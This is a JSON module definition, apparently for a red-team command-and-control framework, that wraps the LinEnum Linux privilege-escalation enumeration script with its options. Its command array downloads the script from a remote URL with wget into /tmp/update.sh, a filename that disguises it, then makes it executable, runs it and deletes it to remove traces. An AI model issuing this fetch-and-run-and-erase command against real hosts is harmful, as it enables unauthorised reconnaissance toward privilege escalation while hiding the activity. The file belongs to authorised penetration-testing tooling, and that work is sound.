Files

40 lines
1.6 KiB
JSON

{
"base": {
"name": "LinEnum",
"author": ["Russel Van Tuyl (@Ne0nd0g)"],
"credits": ["Owen (@rebootuser)"],
"path": ["linux", "x64", "bash", "privesc", "LinEnum.json"],
"platform": "linux",
"arch": "x64",
"lang": "bash",
"privilege": false,
"type": "standard",
"notes": "WARNING: This module will take a long time to complete and return data",
"remote": "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh",
"local": ["data", "src", "rebootuser", "LinEnum", "LinEnum.sh"],
"options": [
{"name": "keyword", "value": "", "required": false, "flag": "-k", "description":"Enter keyword"},
{"name": "export", "value": "", "required": false, "flag": "-e", "description":"Enter export location"},
{"name": "thorough", "value": "", "required": false, "flag": "-t", "description":"Include thorough (lengthy) tests"},
{"name": "report", "value": "", "required": false, "flag": "-r", "description":"Enter report name"},
{"name": "help", "value": "", "required": false, "flag": "-h", "description":"Displays the help text"}
],
"description": "A script to enumerate local information from a Linux host",
"commands": [
"/bin/sh",
"-c",
"\"wget", "-O /tmp/update.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;",
"chmod",
"+x",
"/tmp/update.sh;",
"/tmp/update.sh",
"{{keyword}}",
"{{export}}",
"{{thorough.Flag}}",
"{{report}}",
"{{help.Flag}}",
";",
"rm /tmp/update.sh\""
]
}
}